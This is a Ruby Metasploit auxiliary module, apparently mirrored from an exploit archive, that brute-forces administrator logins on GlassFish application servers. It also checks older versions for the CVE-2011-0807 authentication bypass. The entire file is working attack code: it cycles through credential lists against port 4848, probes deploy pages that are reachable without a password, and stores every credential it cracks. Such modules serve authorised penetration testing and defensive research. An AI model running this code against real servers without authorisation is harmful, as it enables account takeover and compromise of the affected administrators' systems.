## https://sploitus.com/exploit?id=PACKETSTORM:181110
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/login_scanner/glassfish'
require 'metasploit/framework/credential_collection'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'GlassFish Brute Force Utility',
'Description' => %q{
This module attempts to login to GlassFish instance using username and password
combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.
It will also try to do an authentication bypass against older versions of GlassFish.
Note: by default, GlassFish 4.0 requires HTTPS, which means you must set the SSL option
to true, and SSLVersion to TLS1. It also needs Secure Admin to access the DAS remotely.
},
'Author' =>
[
'Joshua Abraham <jabra[at]spl0it.org>', # @Jabra
'sinn3r'
],
'References' =>
[
['CVE', '2011-0807'],
['OSVDB', '71948']
],
'License' => MSF_LICENSE
)
register_options(
[
# There is no TARGETURI because when Glassfish is installed, the path is /
Opt::RPORT(4848),
OptString.new('USERNAME',[true, 'A specific username to authenticate as','admin']),
])
end
#
# Module tracks the session id, and then it will have to pass the last known session id to
# the LoginScanner class so the authentication can proceed properly
#
#
# For a while, older versions of Glassfish didn't need to set a password for admin,
# but looks like no longer the case anymore, which means this method is getting useless
# (last tested: Aug 2014)
#
def is_password_required?(version)
success = false
if version =~ /^[29]\.x$/
res = send_request_cgi({'uri'=>'/applications/upload.jsf'})
p = /<title>Deploy Enterprise Applications\/Modules/
if (res && res.code.to_i == 200 && res.body.match(p) != nil)
success = true
end
elsif version =~ /^3\./
res = send_request_cgi({'uri'=>'/common/applications/uploadFrame.jsf'})
p = /<title>Deploy Applications or Modules/
if (res && res.code.to_i == 200 && res.body.match(p) != nil)
success = true
end
end
success
end
def init_loginscanner(ip)
@cred_collection = build_credential_collection(
username: datastore['USERNAME'],
password: datastore['PASSWORD']
)
@scanner = Metasploit::Framework::LoginScanner::Glassfish.new(
configure_http_login_scanner(
cred_details: @cred_collection,
stop_on_success: datastore['STOP_ON_SUCCESS'],
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
connection_timeout: 5,
http_username: datastore['HttpUsername'],
http_password: datastore['HttpPassword']
)
)
end
def do_report(ip, port, result)
service_data = {
address: ip,
port: port,
service_name: 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
private_data: result.credential.private,
private_type: :password,
username: result.credential.public,
}.merge(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: result.status
}.merge(service_data)
create_credential_login(login_data)
end
def bruteforce(ip)
@scanner.scan! do |result|
case result.status
when Metasploit::Model::Login::Status::SUCCESSFUL
print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"
do_report(ip, rport, result)
when Metasploit::Model::Login::Status::DENIED_ACCESS
print_brute :level => :status, :ip => ip, :msg => "Correct credentials, but unable to login: '#{result.credential}'"
do_report(ip, rport, result)
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
if datastore['VERBOSE']
print_brute :level => :verror, :ip => ip, :msg => "Could not connect"
end
invalidate_login(
address: ip,
port: rport,
protocol: 'tcp',
public: result.credential.public,
private: result.credential.private,
realm_key: result.credential.realm_key,
realm_value: result.credential.realm,
status: result.status
)
when Metasploit::Model::Login::Status::INCORRECT
if datastore['VERBOSE']
print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
end
invalidate_login(
address: ip,
port: rport,
protocol: 'tcp',
public: result.credential.public,
private: result.credential.private,
realm_key: result.credential.realm_key,
realm_value: result.credential.realm,
status: result.status
)
end
end
end
#
# main
#
def run_host(ip)
init_loginscanner(ip)
msg = @scanner.check_setup
if msg
print_brute :level => :error, :ip => rhost, :msg => msg
return
end
print_brute :level=>:status, :ip=>rhost, :msg=>('Checking if Glassfish requires a password...')
if @scanner.version =~ /^[239]\.x$/ && is_password_required?(@scanner.version)
print_brute :level => :good, :ip => ip, :msg => "Note: This Glassfish does not require a password"
else
print_brute :level=>:status, :ip=>rhost, :msg=>("Glassfish is protected with a password")
end
bruteforce(ip) unless @scanner.version.blank?
end
end